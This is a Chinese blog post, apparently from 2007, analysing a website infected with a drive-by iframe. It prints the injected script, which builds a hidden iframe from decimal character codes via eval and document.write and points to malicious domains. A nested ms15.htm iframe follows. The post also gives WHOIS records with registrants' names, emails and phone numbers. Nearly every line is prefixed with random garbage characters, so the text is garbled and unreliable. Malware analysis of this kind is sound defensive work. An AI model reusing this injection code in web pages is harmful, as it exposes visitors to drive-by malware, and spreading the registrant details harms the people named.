首发在我的博客里面,
H}}�g�\|r& �L-V+�`![{ http://www.areway.cn/?p=175 �sn�=_-uoU �,-� FC��� IN#�Z(FMVC 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
X�@�cO�`P 2F-
]0kGR| <script>t=’60,105,102,114,97,109,101,
�.�e|�VW�) 32,115,114,99,61,104,116,116,112,58,47,47,
J3P�)o�M[� 102,114,101,101,46,117,45,117,117,117,46,99,
rM�5{R}+�; 110,47,101,114,114,111,114,46,104,116,109,
�z�&@O\>Q 32,119,105,100,116,104,61,49,48,48,32,104,
�SZ�)A�O8& 101,105,103,104,116,61,48,62,60,47,105,102,
*~H\#�N|x� 114,97,109,101,62′;
�W2� p�&LP t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
1w|C+m�/�( ��o�BqWIXM <script>t=’60,105,102,114,97,109,101,32,115,
!T�3�b�]0z 114,99,61,104,116,116,112,58,47,47,102,114,
0'Y�'K6hG` 101,101,46,117,45,117,117,117,46,99,110,47,
^;[|,:8f7L 101,114,114,111,114,46,104,116,109,32,119,
z3+7�gp+I; 105,100,116,104,61,49,48,48,32,104,101,105,
�XzV:q!e�- 103,104,116,61,48,62,60,47,105,102,114,97,
<f+��9wuZ 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
1NI%J �B� document.write(t);</script>
#eK�g!]4-R ?r"Q��Ja>� <html xmlns=”
Okt0b|=`1* http://www.w3.org/1999/xhtml �BGO!c��[- “>
C�!%\cy%Xj <head>
�20Rj�
�Rd <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
E Qn4���+ <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
J�g:�%|g� <title>首页 - 爱生活家庭网
3|qT.�QR`Z h�CvK2Xu�� 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
R3,�O;9i�� 转换字符串后的大概内容是(谁点击后果自付):
� W���P�nw <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
a�y��-M.�J �R�z\:)�<G 查询玉米u-uuu.cn的详细信息:
(|kc�SnF0� Domain Name: u-uuu.cn
m?4�L��>�' ROID: 20070901s10001s64972306-cn
b�rXLx�+H8 Domain Status: ok
�dvLO��#o{ Registrant Organization: 王雷
KDQqN]��rg Registrant Name: 王雷
Yfotq�9.=+ Administrative Email:
czlovexs@126.com gZ� �b�+�m Sponsoring Registrar: 北京万网志成科技有限公司
�:�<w2j�6V Name Server:ns.yovole.com
LLlt9(^d� Name Server:ns1.yovole.com
}>�T$�2"pf Registration Date: 2007-09-01 17:54
R_�����|Sg Expiration Date: 2008-09-01 17:54
�~0 �5p+F) 最后PING了一下地址 都没有什么….
TcjTF�|�q> p�iv/QP-X� 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
kafRuO~�$� <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
~,�j�B�m^4 <script language=”javascript” src=”
sCi"qtHP� http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script �y8k*{1MuO >
M`�j�qU��g 这个玉米应该有可能是木马作者的:
�,�|u^-J@
foafau.info的详细信息:
Q3OGU}���F Access to INFO WHOIS information is provided to assist persons in
|y��T-N3H@ determining the contents of a domain name registration record in the
A�XmW7/Sj" Afilias registry database. The data in this record is provided by
vy&< ��O Afilias Limited for informational purposes only, and Afilias does not
H,�I�k&{@j guarantee its accuracy. This service is intended only for query-based
�czH`a=mjH access. You agree that you will use this data only for lawful purposes
rQ+2 -|#�� and that, under no circumstances will you use this data to: (a) allow,
8;�vp��a�* enable, or otherwise support the transmission by e-mail, telephone, or
}�/cMG�/%� facsimile of mass unsolicited, commercial advertising or solicitations
~l�SdW�Uk> to entities other than the data recipient’s own existing customers; or
uO�U?-WtPz (b) enable high volume, automated, electronic processes that send
w�E*jN�~�� queries or data to the systems of Registry Operator, a Registrar, or
;3 ��|�Z}P Afilias except as reasonably necessary to register domain names or
"�B���9aJo modify existing registrations. All rights reserved. Afilias reserves
l{�u2W$8�� the right to modify these terms at any time. By submitting this query,
3\~
RWoB0u you agree to abide by this policy.
��ud}B#{6� Domain ID:D22418703-LRMS
!rwe|"8m?u Domain Name:FOAFAU.INFO
&y~E�Eh�|� Created On:20-Nov-2007 16:05:42 UTC
C~PoC�'�"q Last Updated On:20-Nov-2007 16:05:44 UTC
�b{WEux{) Expiration Date:20-Nov-2008 16:05:42 UTC
s'Op|`&�X Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
�]`S3�5�b� Status:CLIENT DELETE PROHIBITED
7 g2�@�RKo Status:CLIENT RENEW PROHIBITED
�tOQur��a� Status:CLIENT TRANSFER PROHIBITED
|}��Ye�Ql� Status:CLIENT UPDATE PROHIBITED
2wKW17wj, Status:TRANSFER PROHIBITED
=Y;w ��O8 Registrant ID:GODA-040110615
�6�L\�?+=X Registrant Name:liu hong
/ZcqKC��
Registrant Organization:
��_��h�7qS Registrant Street1:beijing
H7=��[sL^� Registrant Street2:
6gSo�>�F4= Registrant Street3:
��gr%!�<2w Registrant City:beijing
0
js�z�Z�_ Registrant State/Province:
O�5�;$cP�: Registrant Postal Code:100000
l��uYa+E�0 Registrant Country:CN
��LBs:O*�; Registrant Phone:+86.860108888777
�a�fJ`1l� Registrant Phone Ext.:
���t(,�_�� Registrant FAX:
a*f�UMhIi� Registrant FAX Ext.:
�hr�t�]Qn& Registrant Email:bbbshiji@163.com
�Cc7YjsRW� Admin ID:GODA-240110615
P{{pp<tX*& Admin Name:liu hong
K}(�0�H�[P Admin Organization:
f��QtV-\Bc Admin Street1:beijing
_r6aLm2n�� Admin Street2:
8&0+Az"{O� Admin Street3:
>gqd
y�*Bg Admin City:beijing
/N'|�Vs,X� Admin State/Province:
l_`DQ�8L`� Admin Postal Code:100000
HU��='Hk!� Admin Country:CN
ZV?�~~�_�9 Admin Phone:+86.860108888777
��H%��AF, Admin Phone Ext.:
��fN����kN Admin FAX:
V6.w=�6:`X Admin FAX Ext.:
JkiMrpkuk Admin Email:bbbshiji@163.com
ls<7�Q�e"a Billing ID:GODA-340110615
'aFj�y�Y?% Billing Name:liu hong
/1Q
i9u�it Billing Organization:
4kZ�9�]5#. Billing Street1:beijing
P%-�@AmO^_ Billing Street2:
�)�w.\xA~| Billing Street3:
ND3(oes+;K Billing City:beijing
q!5 *)�nw" Billing State/Province:
!oDX+hd,%> Billing Postal Code:100000
D0�2_ Jrg� Billing Country:CN
e�e9nfvG-� Billing Phone:+86.860108888777
GOx+�%`.R\ Billing Phone Ext.:
�+�}�u{��{ Billing FAX:
�8LH"��j(H Billing FAX Ext.:
k��N9�9��( Billing Email:bbbshiji@163.com
:��())%Xu3 Tech ID:GODA-140110615
qg(rG5kD�@ Tech Name:liu hong
X9d~r_2&m< Tech Organization:
/61�P`1y(J Tech Street1:beijing
D{4Ehr "T� Tech Street2:
4IW�7^Pq`P Tech Street3:
:=I@<@82�W Tech City:beijing
-X)KY_Xn@/ Tech State/Province:
~Po�BvH�i Tech Postal Code:100000
@7C?]/��8# Tech Country:CN
o,#[S��e*n Tech Phone:+86.860108888777
FK8G�Bk�Q! Tech Phone Ext.:
b�)5z�'zQu Tech FAX:
�RH=�T�u6i Tech FAX Ext.:
�t�c_D�8Q_ Tech Email:bbbshiji@163.com
v�@6TC�1M, Name Server:NS27.DOMAINCONTROL.COM
%�dyE��F8) Name Server:NS28.DOMAINCONTROL.COM
@y#QH�J.j
Name Server:
� ?C�u1"bl Name Server:
7xmyjy%�c Name Server:
:n�4�X>YL) Name Server:
?�-�"%�%�# Name Server:
�n$ri:��~s Name Server:
7:�Jyu/*�] Name Server:
-]�uN16\ F Name Server:
e���T�V%�+ Name Server:
�Mk*&C�No3 Name Server:
YR�kp(}*!\ Name Server:
�$S�P�*hkU �jf_�0�I�E 接着下载每个文件里面的代码:
0�S���{dnp 一步一步看..
�J5J�$qCJq 
�}Z|uLXaz� 
�xKKR'v:o\ 
Or0�eY#c�� 
:OF:(�,J�� 
qrFC�4\q} 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试
